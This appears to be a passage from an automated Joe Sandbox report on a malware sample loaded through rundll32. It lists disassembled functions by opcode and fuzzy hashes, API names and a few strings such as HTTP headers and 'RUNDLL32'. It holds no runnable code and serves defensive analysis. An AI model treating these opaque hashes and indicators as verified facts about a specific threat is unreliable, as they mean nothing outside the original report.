                                                                                                  • Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                                                  • Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
                                                                                                  • Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                                                  • Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180033068 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
                                                                                                  • Opcode ID: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                                                  • Instruction ID: d9e03fda3b1d153f0bd4bb02b331d59468f410aa3c35072f5ffbfd31d5bd1a6e
                                                                                                  • Opcode Fuzzy Hash: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                                                  • Instruction Fuzzy Hash: CD21D632601A4482EB568F29D89139EB3A0FB88BF4F198715EA79476E8DF7CC644C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003C614 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 112427268-0
                                                                                                  • Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                                                  • Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
                                                                                                  • Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                                                  • Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001AF10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Initialize$DeleteEnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3345835275-0
                                                                                                  • Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                                                  • Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
                                                                                                  • Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                                                  • Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180070910 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno_msizememsetrealloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1716158884-0
                                                                                                  • Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                                                  • Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
                                                                                                  • Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                                                  • Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018007F080 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 390474681-0
                                                                                                  • Opcode ID: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                                                  • Instruction ID: 14b1c1fe1981e25254dae316b1258392d266da5cf9c387dbe4ce1a9d85b7c1af
                                                                                                  • Opcode Fuzzy Hash: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                                                  • Instruction Fuzzy Hash: 2401D631B1469C42FAE66B56F0003EE5250AB8CBD0F48D020BF4557B8FCE2ECA968740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180064710 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 2347899730-0
                                                                                                  • Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                                  • Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
                                                                                                  • Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                                  • Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A900 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_swprintf_c_l$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1259558433-0
                                                                                                  • Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                                  • Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
                                                                                                  • Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                                  • Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001A3F0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 2162964266-0
                                                                                                  • Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                                  • Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
                                                                                                  • Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                                  • Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001D048 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsncmp$FromListPath
                                                                                                  • String ID: http://$https://
                                                                                                  • API String ID: 1354619976-1916535328
                                                                                                  • Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                                  • Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
                                                                                                  • Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                                  • Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001B0D4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1398880316-0
                                                                                                  • Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                                  • Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
                                                                                                  • Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                                  • Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180073130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __pctype_func
                                                                                                  • String ID: (null)$(null)
                                                                                                  • API String ID: 3630429742-1601437019
                                                                                                  • Opcode ID: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                                                  • Instruction ID: 4da43dc6e52408ab09b3749884352dd554f5e104f70e5d3a12e7d890f492f9a7
                                                                                                  • Opcode Fuzzy Hash: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                                                  • Instruction Fuzzy Hash: 0F81F07221068886FBEB8F2880523E967A1F749BD4F44D115FE4A57798DF3ECA89C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180042CB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94
                                                                                                    • Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCriticalInitializeMultiSectionWide
                                                                                                  • String ID: Cache-Control: no-cache$Connection: Keep-Alive
                                                                                                  • API String ID: 2071930665-2797312137
                                                                                                  • Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                                  • Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
                                                                                                  • Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                                  • Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003A138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                  • String ID: map/set<T> too long
                                                                                                  • API String ID: 909987262-1285458680
                                                                                                  • Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                                  • Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
                                                                                                  • Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                                  • Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001C31C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindNamePathwcscmp
                                                                                                  • String ID: RUNDLL32
                                                                                                  • API String ID: 3222201028-252960710
                                                                                                  • Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                                  • Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
                                                                                                  • Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                                  • Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005944C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpswprintf
                                                                                                  • String ID: %X%X%X%X
                                                                                                  • API String ID: 6652212-3817614625
                                                                                                  • Opcode ID: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
                                                                                                  • Instruction ID: 5baa55fa5f1c5327c79efc128b9da1770f88ddfa4c7447b56b890561a4175455
                                                                                                  • Opcode Fuzzy Hash: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
                                                                                                  • Instruction Fuzzy Hash: 2C3129B36166C446FBA39FA4A4013ED7BA0E7197C4F48C126F6C647696DA2FC64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000D718 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000018000C25C), ref: 000000018000D7AF
                                                                                                  • _wtoi64.MSVCRT ref: 000000018000D7B8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileHeapProcessSystem_wtoi64
                                                                                                  • String ID: __LastModified__
                                                                                                  • API String ID: 76029450-3092259212
                                                                                                  • Opcode ID: 4a951d53cc273b8493fc538d7d39a9e91a9e5a3ce9ebdf176f309d42d7b01bf9
                                                                                                  • Instruction ID: 78280a3659b5bbb0132e7b878d74b07e121d7b65ff89b3d97cbad59726871672
                                                                                                  • Opcode Fuzzy Hash: 4a951d53cc273b8493fc538d7d39a9e91a9e5a3ce9ebdf176f309d42d7b01bf9
                                                                                                  • Instruction Fuzzy Hash: E231A272701B4882EA55DB69E800399B360F789BE4F54C226EB6D077E9DF38C649C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180019224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
